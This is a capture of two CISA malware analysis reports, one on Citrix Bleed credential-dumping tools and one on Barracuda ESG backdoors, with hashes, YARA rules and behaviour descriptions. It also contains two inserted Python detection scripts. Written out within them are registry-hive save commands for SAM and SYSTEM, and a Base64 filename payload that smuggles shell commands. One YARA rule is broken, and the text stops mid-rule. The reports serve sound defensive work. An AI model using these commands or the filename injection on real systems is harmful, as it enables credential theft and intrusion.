Analysis Reports

RSS Analysis Reports from National Cyber Awareness System

November 21, 2023

MAR-10478915-1.v1 Citrix Bleed | CISA

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

Responding to the recently disclosed CVE-2023-4966, affecting Citrix NetScaler ADC and NetScaler Gateway appliances, CISA received four files for analysis. The files show tooling being used to save registry hives, dump the Local Security Authority Subsystem Service (LSASS) process memory to disk, and attempt to establish sessions via Windows Remote Management (WinRM). The files include:

  • Windows Batch file (.bat)
  • Windows Executable (.exe)
  • Windows Dynamic Link Library (.dll)
  • Python Script (.py)

For more information about this vulnerability, see Joint Cybersecurity Advisory #StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability.

Download the PDF version of this report:

MAR-10478915-1.v1 Citrix Bleed (PDF, 547.33 KB)

For a downloadable copy of IOCs associated with this MAR in JSON format, see:

AR23-325A JSON (JSON, 37.22 KB)
Submitted Files (4)

17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994 (a.dll)

906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6 (a.py)

98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9 (a.bat)

e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068 (a.exe)

Findings

98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9

Details

Name a.bat
Size 376 bytes
Type DOS batch file, ASCII text, with CRLF line terminators
MD5 52d5e2a07cd93c14f1ba170e3a3d6747
SHA1 8acaf9908229871ab33033df7b6a328ec1db56d5
SHA256 98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9
SHA512 317414f28d34f8295aa76cf9f39d4fd42c9bad292458dbd2a19f08a6a8b451e271179b7ef78afd8a2fe92a2e1103d9ef5e220557febf42d91900c268b8d61b69
ssdeep 6:halw5fwmUDXSLp8k7KdXSLp8kukK7va2RK4HvEEIVpmYY:sMULS98QAS98kuZ7XPcK3
Entropy 4.675128
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10478915_01 : trojan installs_other_components
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10478915"
           date = "2023-11-06"
           last_modified = "20231108_1500"
           actor = "n/a"
           family = "n/a"
           capabilities = "installs-other-components"
           malware_Type = "trojan"
           tool_type = "information-gathering"
           description = "Detects trojan .bat samples"
           sha256 = "98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9"
       strings:
           $s1 = { 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 7a 2e 74 78 74 }
           $s2 = { 72 65 67 20 73 61 76 65 20 68 6b 6c 6d 5c 73 79 73 74 65 6d 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 65 6d }
           $s3 = { 6d 61 6b 65 63 61 62 20 63 3a 5c 75 73 65 72 73 5c 70 75 62 6c 69 63 5c 61 2e 70 6e 67 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 61 2e 63 61 62 }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Relationships
98e79f95cf... Related_To e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068
98e79f95cf... Related_To 17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994
Description

This file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an argument. The output is written to a file named 'z.txt' located in the path C:\Windows\Tasks. Next, a.bat pings the loopback Internet Protocol (IP) address 127.0.0[.]1 three times.

The next command it runs is reg save, which saves the HKLM\SYSTEM registry hive to C:\Windows\Tasks\em. Again, a.bat pings the loopback address 127.0.0[.]1, this time once, before executing another reg save command that saves the HKLM\SAM registry hive to C:\Windows\Tasks\am. Next, a.bat runs three makecab commands to create three Cabinet (.cab) files from the two saved registry hives and one file named C:\Users\Public\a.png. The names of the .cab files are as follows:

--Start names and paths of .cab files created--
c:\windows\tasks\em.cab
c:\windows\tasks\am.cab
c:\windows\tasks\a.cab
--End names and paths of .cab files created--
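One way to hunt for this command sequence in process-creation telemetry, as an added example that is not part of the CISA report: the records below are constructed Sysmon-style events modelled on the a.bat behaviour described above, and the field names (pid, ppid, image, cmdline) and the correlation-by-parent-pid logic are assumptions of this example, not something the report states.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation records (not from the report),
# modelled on the a.bat command sequence: pid/ppid, image and command line.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Windows\Tasks\a.bat"},
    {"pid": 4130, "ppid": 4120, "image": r"C:\Windows\Tasks\a.exe",
     "cmdline": r"a.exe C:\Windows\Tasks\a.dll"},
    {"pid": 4131, "ppid": 4120, "image": r"C:\Windows\System32\PING.EXE",
     "cmdline": "ping -n 3 127.0.0.1"},
    {"pid": 4132, "ppid": 4120, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save hklm\system c:\windows\tasks\em"},
    {"pid": 4133, "ppid": 4120, "image": r"C:\Windows\System32\PING.EXE",
     "cmdline": "ping -n 1 127.0.0.1"},
    {"pid": 4134, "ppid": 4120, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save hklm\sam c:\windows\tasks\am"},
    {"pid": 4135, "ppid": 4120, "image": r"C:\Windows\System32\makecab.exe",
     "cmdline": r"makecab c:\windows\tasks\em c:\windows\tasks\em.cab"},
    {"pid": 4136, "ppid": 4120, "image": r"C:\Windows\System32\makecab.exe",
     "cmdline": r"makecab c:\users\public\a.png c:\windows\tasks\a.cab"},
    # Unrelated administrative activity in another process tree; must not alert.
    {"pid": 5000, "ppid": 800, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query hklm\software\microsoft\windows\currentversion"},
]

# reg save of a credential-bearing hive (SAM, SYSTEM or SECURITY).
HIVE_SAVE = re.compile(r"^\s*reg(?:\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)
# makecab <source> <destination>; flagged only when either path is a staging dir.
MAKECAB = re.compile(r"^\s*makecab(?:\.exe)?\s+(\S+)\s+(\S+)", re.I)
# ping -n <count> 127.0.0.1: the sleep substitute a.bat uses between steps.
PING_LOOPBACK = re.compile(r"^\s*ping(?:\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1\s*$", re.I)
# World-writable locations the sample stages output in (lower-cased for matching).
STAGING_DIRS = ("\\windows\\tasks\\", "\\users\\public\\")


def classify(cmdline):
    """Return the a.bat step a command line resembles, or None."""
    if HIVE_SAVE.match(cmdline):
        return "hive_save"
    m = MAKECAB.match(cmdline)
    if m and any(d in path.lower() for path in m.groups() for d in STAGING_DIRS):
        return "cab_staging"
    if PING_LOOPBACK.match(cmdline):
        return "ping_delay"
    return None


def correlate(events):
    """Group the classified steps by parent pid, i.e. per batch-file interpreter."""
    steps = defaultdict(set)
    for ev in events:
        tag = classify(ev["cmdline"])
        if tag:
            steps[ev["ppid"]].add(tag)
    return dict(steps)


def alerts(events):
    """Parent pids whose children both saved a hive and packaged a staging dir."""
    return sorted(ppid for ppid, tags in correlate(events).items()
                  if {"hive_save", "cab_staging"} <= tags)


if __name__ == "__main__":
    for ppid, tags in correlate(SAMPLE_EVENTS).items():
        print(f"parent {ppid}: {sorted(tags)}")
    print("alert on parents:", alerts(SAMPLE_EVENTS))
```

A lone reg save or makecab is common administrative activity; the alert fires only when one parent process chains a hive save with packaging into a staging directory, which is the combination a.bat exhibits.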

Screenshots
Figure 1. - This is the full contents of the file a.bat.

e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068
Tags

trojan

Details

Name a.exe
Size 145920 bytes
Type PE32+ executable (console) x86-64, for MS Windows
MD5 37f7241963cf8279f7c1d322086a5194
SHA1 ec401ae8ddebef4038cedb65cc0d5ba6c1fdef28
SHA256 e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068
SHA512 02c2473b90ba787fea41a9840c7dc9a9869685ca8fdca3521278e0cc986e1797e36552f41f1ac206f5ec5bdc0ac40f13cd36217aea3aad13518e9764ea92c1f7
ssdeep 3072:u8txkT6wDLf/p3ufznQbCQVlvxxV5hmWIh:NgpDbZufLQpjxJ9U
Entropy 6.094246
Malware Result unknown
Antivirus
Antiy Trojan/Win64.Malgent
Avira TR/Redcap.sbphc
Bitdefender Trojan.GenericKD.70103917
Emsisoft Trojan.GenericKD.70103917 (B)
IKARUS Trojan.Win64.Malgent
K7 Riskware ( 00584baa1 )
YARA Rules
  • rule CISA_10478915_02 : trojan installs_other_components
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10478915"
           date = "2023-11-06"
           last_modified = "20231108_1500"
           actor = "n/a"
           family = "n/a"
           capabilities = "installs-other-components"
           malware_type = "trojan"
           tool_type = "unknown"
           description = "Detects trojan PE32 samples"
           sha256 = "e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068"
       strings:
           $s1 = { 57 72 69 74 65 46 69 6c 65 }
           $s2 = { 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 }
           $s3 = { 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74 }
           $s4 = { 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 }
           $s5 = { 64 65 6c 65 74 65 5b 5d }
           $s6 = { 4e 41 4e 28 49 4e 44 29 }
       condition:
           uint16(0) == 0x5a4d and pe.imphash() == "6e8ca501c45a9b85fff2378cffaa24b2" and pe.size_of_code == 84480 and all of them
    }
ssdeep Matches

No matches found.

Relationships
e557e1440e... Related_To 17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994
e557e1440e... Related_To 98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9
Description

This file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat. It issues the Remote Procedure Call (RPC) ncalrpc:[lsasspirpc] to the RPC endpoint to obtain a file path to LSASS on the infected machine. Once the file path is returned, the malware loads the accompanying DLL file called a.dll into the running LSASS process. If the DLL is loaded correctly, the malware outputs the message "[*]success" in the console.

17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994

Tags

trojan

Details

Name a.dll
Size 106496 bytes
Type PE32+ executable (DLL) (console) x86-64, for MS Windows
MD5 206b8b9624ee446cad18335702d6da19
SHA1 364ef2431a8614b4ef9240afa00cd12bfba3119b
SHA256 17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994
SHA512 efa720237bd2773719d7f8e377f63f93d25a691a6f2b8f52ff9ecbd1495c215690d01400d8b7fd9bb79b47de09817d72c82676b67ed70ecf61b002c7d8e9e11d
ssdeep 3072:oCNLoO2N+p5Fm6nfZvD8sLVdN9dtFiokDFMYLcu:j1o/+34YRvDtFiwu
Entropy 5.940807
Malware Result unknown
Antivirus
Antiy Trojan/Win64.Agent
Bitdefender Trojan.GenericKD.70057986
Emsisoft Trojan.GenericKD.70057986 (B)
ESET a variant of Win64/Agent.DAU trojan
IKARUS Trojan.Win64.Agent
K7 Trojan ( 005ad67a1 )
Zillya! Trojan.Agent.Win64.39686
YARA Rules
  • rule CISA_10478915_03 : trojan steals_authentication_credentials credential_exploitation
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10478915"
           date = "2023-11-06"
           last_modified = "20231108_1500"
           actor = "n/a"
           family = "n/a"
           capabilities = "steals-authentication-credentials"
           malware_type = "trojan"
           tool_type = "credential-exploitation"
           description = "Detects trojan DLL samples"
           sha256 = "17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994"
       strings:
           $s1 = { 64 65 6c 65 74 65 }
           $s2 = { 3c 2f 74 72 75 73 74 49 6e 66 6f 3e }
           $s3 = { 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 }
           $s4 = { 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78 }
           $s5 = { 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57 }
           $s6 = { 47 65 74 54 69 63 6b 43 6f 75 6e 74 }
       condition:
           uint16(0) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_WINDOWS_CUI and pe.size_of_code == 56832 and all of them
    }
ssdeep Matches

No matches found.

Relationships
17a27b1759... Related_To e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068
17a27b1759... Related_To 98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9
Description

This file is a 64-bit Windows DLL called a.dll that is passed by a.bat as a parameter to the file a.exe. The file a.exe loads this file into the running LSASS process on the infected machine. The file a.dll calls the Windows API CreateFileW to create a file called a.png in the path C:\Users\Public.

Next, a.dll loads DbgCore.dll and uses the MiniDumpWriteDump function to dump LSASS process memory to disk. If successful, the dumped process memory is written to a.png. Once this is complete, a.bat uses the file a.png to create the cabinet file called a.cab in the path C:\Windows\Tasks.

Screenshots
Figure 2. - This is the call through register R14, which holds the address of the MiniDumpWriteDump function that is being leveraged to dump the LSASS process memory to disk.

906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6
Details

Name a.py
Size 2645 bytes
Type Python script, ASCII text executable, with CRLF line terminators
MD5 9cff554fa65c1b207da66683b295d4ad
SHA1 b8e74921d7923c808a0423e6e46807c4f0699b6e
SHA256 906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6
SHA512 131621770e1899d81e6ff312b3245fe4e4013c36f82818a82fdd319982e6b742a72d906b6fb86c422bb720cd648f927b905a8fc193299ad7d8b3947e766abbd3
ssdeep 48:BpsnUP6s3ceBg5YbFYNXEtUyzzYyUyh0+FVzYA6P+Fqbaug9trYhTHhIQG86w09:BuUP6sseBIOqXEvpcrb89Z2THCQ6P
Entropy 4.748972
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10478915_04 : backdoor communicates_with_c2 remote_access
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10478915"
           date = "2023-11-06"
           last_modified = "20231108_1500"
           actor = "n/a"
           family = "n/a"
           capabilities = "communicates-with-c2"
           malware_type = "backdoor"
           tool_type = "remote-access"
           description = "Detects trojan python samples"
           sha256 = "906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6"
       strings:
           $s1 = { 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22 }
           $s2 = { 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a }
           $s3 = { 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72 }
           $s4 = { 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29 }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Description

This file is a Python script called a.py that attempts to establish a session using WinRM. The script attempts to authenticate to the remote machine using NT LAN Manager (NTLM) if the keyword "hashpasswd" is present. If the keyword "hashpasswd" is not present, the script attempts to authenticate using basic authentication. Once a WinRM session is established with the remote machine, the script can execute the commands supplied as command-line arguments on the remote machine. If no command is specified, a default command of "whoami" is run.

Screenshots
Figure 3. - This is the portion of the Python script that shows the command line options.
Figure 4. - This is the function showing how the script decides between using NTLM or basic authentication based on the keyword "hashpasswd".

Relationship Summary

98e79f95cf... Related_To e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068
98e79f95cf... Related_To 17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994
e557e1440e... Related_To 17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994
e557e1440e... Related_To 98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9
17a27b1759... Related_To e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068
17a27b1759... Related_To 98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

September 7, 2023

MAR-10454006.r5.v1 SUBMARINE, SKIPJACK, SEASPRAY, WHIRLPOOL, and SALTWATER Backdoors | CISA

Summary

Description

CISA obtained five malware samples, including artifacts related to the SUBMARINE, SKIPJACK, SEASPRAY, WHIRLPOOL, and SALTWATER backdoors. The device they were recovered from was compromised by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001 through 9.2.0.006 of the Barracuda Email Security Gateway (ESG).

For information about related malware, specifically information on the initial exploit payload, SEASPY backdoor, WHIRLPOOL backdoor, and the SUBMARINE backdoor, see CISA Alert: CISA Releases Malware Analysis Reports on Barracuda Backdoors.

Download the PDF version of this report:

AR23-250A_PDF (PDF, 1.05 MB)

For a downloadable copy of IOCs associated with this MAR in JSON format, see:

AR23-250A_JSON (JSON, 41.77 KB)
Submitted Files (5)

4183edae732506a18b5c802cbf0a471a77c3f1e4336a32ccb4958671e404493c (machineecho_-n_Y2htb2QgK3ggL3J...)

44e1fbe71c9fcf9881230cb924987e0e615a7504c3c04d44ae157f07405e3598 (mod_sender.lua)

63788797919985d0e567cf9133ad2ab7a1c415e81598dc07c0bfa3a1566aeb90 (get_fs_info.pl)

9f04525835f998d454ed68cfc7fcb6b0907f2130ae6c6ab7495d41aa36ad8ccf (saslautchd)

caab341a35badbc65046bd02efa9ad2fe2671eb80ece0f2fa9cf70f5d7f4bedc (mod_rft.so)

Findings

4183edae732506a18b5c802cbf0a471a77c3f1e4336a32ccb4958671e404493c

Details

Name machineecho_-n_Y2htb2QgK3ggL3Jvb3QvbWFjKgpzaCAvcm9vdC9tYWNoKlxgKgoK___base64_-d__sh_-slack
Size 3894 bytes
Type data
MD5 9fdc1dc99bc8184ee410880427dba89c
SHA1 be570775552f937d8588bceb3e2cbb0c18408fc1
SHA256 4183edae732506a18b5c802cbf0a471a77c3f1e4336a32ccb4958671e404493c
SHA512 2bb94fdfe31a464c63b8cd726f6ba1c3b18da538221d5bae943dfb03ec353a41826bdcb007bc2b7dfeb76afe619aa8ce078808e9b30079a6f947cce8ace891ff
ssdeep 3::
Entropy 0.000000
Malware Result unknown
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a SUBMARINE artifact: an empty text/data file. The file name is designed to exploit a vulnerability in the target environment such that the Base64 string embedded in the name is decoded and executed by the Linux shell. The decoded code in Figure 1 marks any directory, file or path beginning with '/root/mac' as executable, then executes, via sh, anything matching the path '/root/mach*'.
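A defender-side check of what such a file name carries, added here as an example that is not part of the CISA report: it decodes the Base64 run inside the catalogued artifact name from the Details table above and flags names that pair a decoder pipeline with a payload that decodes to shell commands. The underscore-for-space mangling of the stored name, the length threshold and the verb list are assumptions of this example.

```python
import base64
import binascii
import re

# Artifact name as catalogued in the report; spaces, pipes and backticks of the
# original name were replaced with underscores when the sample was stored.
ARTIFACT_NAME = ("machineecho_-n_Y2htb2QgK3ggL3Jvb3QvbWFjKgpzaCAvcm9vdC9tYWNoKlxgKgoK"
                 "___base64_-d__sh_-slack")

# A base64 run long enough to carry a command (shorter runs are ordinary words).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Decoder pipeline fragment, either verbatim or after underscore mangling.
DECODER_HINT = re.compile(r"base64[ _]-d", re.I)
# Tokens that mark a decoded payload as a shell command rather than text.
SHELL_VERBS = ("chmod", "sh ", "bash", "curl", "wget", "/root/")


def embedded_base64_text(name):
    """Decode every long base64 run in a file name that decodes to clean UTF-8."""
    found = []
    for run in B64_RUN.findall(name):
        try:
            found.append(base64.b64decode(run, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # not real base64 (bad padding/alphabet) or binary noise
    return found


def assess_attachment_name(name):
    """Describe why a file name looks like a shell-injection carrier, if it does."""
    payloads = embedded_base64_text(name)
    commands = [line for text in payloads for line in text.splitlines() if line.strip()]
    reasons = []
    if DECODER_HINT.search(name):
        reasons.append("decoder pipeline in name")
    if any(verb in text for text in payloads for verb in SHELL_VERBS):
        reasons.append("base64 payload decodes to shell commands")
    return {"suspicious": bool(reasons), "reasons": reasons, "commands": commands}


if __name__ == "__main__":
    result = assess_attachment_name(ARTIFACT_NAME)
    print("suspicious:", result["suspicious"], result["reasons"])
    for cmd in result["commands"]:
        print("  would run:", cmd)
```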

Screenshots
Figure 1 - Figure 1 depicts the Base64 encoded, and decoded, name of the artifact.


63788797919985d0e567cf9133ad2ab7a1c415e81598dc07c0bfa3a1566aeb90

Details

Name get_fs_info.pl
Size 530 bytes
Type Perl script text executable
MD5 ad1dc51a66201689d442499f70b78dea
SHA1 c71bccdc006cca700257a69ed227e0cb1bc071ed
SHA256 63788797919985d0e567cf9133ad2ab7a1c415e81598dc07c0bfa3a1566aeb90
SHA512 3258af057858ef0930a48771869871736bfb866ef740e81f2518c0d4c217b5c0c5f8eb06985b72a3762ce011458245940be6bb1d4907d2ed0f4e18886bbc48c3
ssdeep 12:HA4SKFBMygPZr7NBiC+c6jaY7PCbozFJG:thFBMZr7NBazjTzCbozG
Entropy 4.638131
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_11 : trojan
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10454006"
           date = "2023-07-20"
           last_modified = "20230726_1700"
           actor = "n/a"
           family = "n/a"
           Capabilities = "n/a"
           Malware_Type = "trojan"
           Tool_Type = "unknown"
           description = "Detects perl script linked to SKIPJACK backdoor samples"
           SHA256 = "63788797919985d0e567cf9133ad2ab7a1c415e81598dc07c0bfa3a1566aeb90"
       strings:
           $s1 = { 2f 65 74 63 2f 66 73 74 61 62 2e 6d 61 69 6e }
           $s2 = { 28 3c 46 53 54 41 42 3e 29 }
           $s3 = { 6d 79 20 28 24 70 61 72 74 69 74 69 6f 6e 2c 20 24 66 73 5f 74 79 70 65 29 }
           $s4 = { 70 72 69 6e 74 20 24 66 73 5f 74 79 70 65 }
           $s5 = { 70 72 69 6e 74 20 24 70 61 72 74 69 74 69 6f 6e }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Description

This artifact, belonging to the SKIPJACK malware family, is a Perl script that enumerates file system information. The script first opens '/etc/fstab.main', then checks the value against 'ARGV[0]', the first element of the array Perl automatically populates with the command-line values. The script prints either 'xfs' or 'hda', depending on the type of file system it finds. The script contains a second if statement that gathers more information about the type of file system. This second if statement contains the regular expression '/^\/dev\/(\S+)\d+\s+\/\s+(\S+)/', which is matched against the entries read from '/etc/fstab'. The script uses this second half of the code to check for the file system type or information about the partition, which it then prints based on the value of '$requested_data'.

Screenshots
Figure 2 - Figure 2 depicts code contained in "get_fs_info.pl."


44e1fbe71c9fcf9881230cb924987e0e615a7504c3c04d44ae157f07405e3598

Details

Name mod_sender.lua
Size 3930 bytes
Type ASCII text
MD5 666da297066a2596cacb13b3da9572bf
SHA1 64b337d7e82c82a4b40c8cb88fbc651929995eef
SHA256 44e1fbe71c9fcf9881230cb924987e0e615a7504c3c04d44ae157f07405e3598
SHA512 4881a79d95bf83190be1542d7b26c7b1dee5eece1a689dc81bf2b661b43b3d724703dc4a48f824d8d960e2a480bcbea2e4007eb19023ee1bf329d993009deffc
ssdeep 96:JnJKszX3Z+p351GUw5FbsNmnwdx8sMEFoiKe3:JnJjzZ+j14FIEnqxjMEKQ
Entropy 5.041616
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_12 : SEASPRAY trojan evades_av
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10454006"
           date = "2023-08-23"
           last_modified = "20230905_1500"
           actor = "n/a"
           family = "SEASPRAY"
           capabilities = "evades-av"
           malware_type = "trojan"
           tool_type = "unknown"
           description = "Detects SEASPRAY samples"
           sha256 = "44e1fbe71c9fcf9881230cb924987e0e615a7504c3c04d44ae157f07405e3598"
       strings:
           $s1 = { 6f 73 2e 65 78 65 63 75 74 65 28 27 73 61 73 6c 61 75 74 63 68 64 27 }
           $s2 = { 73 65 6e 64 65 72 }
           $s3 = { 73 74 72 69 6e 67 2e 66 69 6e 64 }
           $s4 = { 73 74 72 69 6e 67 2e 6c 6f 77 65 72 }
           $s5 = { 62 6c 6f 63 6b 2f 61 63 63 65 70 74 }
           $s6 = { 72 65 74 75 72 6e 20 41 63 74 69 6f 6e 2e 6e 65 77 7b }
           $s7 = { 4c 69 73 74 65 6e 65 72 2e 6e 65 77 7b }
       condition:
           filesize }
ssdeep Matches

No matches found.

Relationships
44e1fbe71c... Used 9f04525835f998d454ed68cfc7fcb6b0907f2130ae6c6ab7495d41aa36ad8ccf
Description

This artifact is a trojanized Lua module that has been identified as a "SEASPRAY" variant. SEASPRAY registers an event handler for all incoming email attachments. This variant checks the sender for the string "obt", which is hard coded in the Lua file. If that string is found, the malware uses os.execute to execute the file "saslautchd" (see Figure 3).

Screenshots
Figure 3 - This screenshot illustrates how the SEASPRAY filters traffic looking for the string "obt". Once that string is received SEASPRAY uses os.execute to execute the file "saslautchd".


9f04525835f998d454ed68cfc7fcb6b0907f2130ae6c6ab7495d41aa36ad8ccf

Tags

trojan

Details

Name saslautchd
Size 5034648 bytes
Type ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=913db6f2f3c21bcb11e0fd02e2b88908b15b5c2d, for GNU/Linux 3.2.0, stripped
MD5 436587bad5e061a7e594f9971d89c468
SHA1 cf22082532d4d6387ea1c9bc4dc5b255aa7a0290
SHA256 9f04525835f998d454ed68cfc7fcb6b0907f2130ae6c6ab7495d41aa36ad8ccf
SHA512 825ba4c46f1f9c5a4f2ab3ccfd8e3ec02f50f749776df783a085aff89cb19ed983b07ecd0703c74a0474bec56e918ada002b683dec1228f18181a91b0b339234
ssdeep 98304:J8sPi2iUKJYO0OAgikIn9FCJM+rXKZ9ldvVkhyfMuG9vU:xVUildN0uX
Entropy 6.384586
Malware Result unknown
Antivirus
Antiy Trojan/Linux.SAgnt
Avira LINUX/Whirlpool.A
Bitdefender Trojan.Generic.34035237
Emsisoft Trojan.Generic.34035237 (B)
ESET Linux/WhirlPool.A trojan
McAfee Generic trojan.xj
Sophos Linux/Agnt-BS
Varist E64/Agent.FP
YARA Rules
  • rule CISA_10452108_02 : WHIRLPOOL backdoor communicates_with_c2 installs_other_components
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10452108"
           date = "2023-06-20"
           last_modified = "20230804_1730"
           actor = "n/a"
           family = "WHIRLPOOL"
           Capabilities = "communicates-with-c2 installs-other-components"
           Malware_Type = "backdoor"
           Tool_Type = "unknown"
           description = "Detects malicious Linux WHIRLPOOL samples"
           sha256_1 = "83ca636253fd1eb898b244855838e2281f257bbe8ead428b69528fc50b60ae9c"
           sha256_2 = "8849a3273e0362c45b4928375d196714224ec22cb1d2df5d029bf57349860347"
       strings:
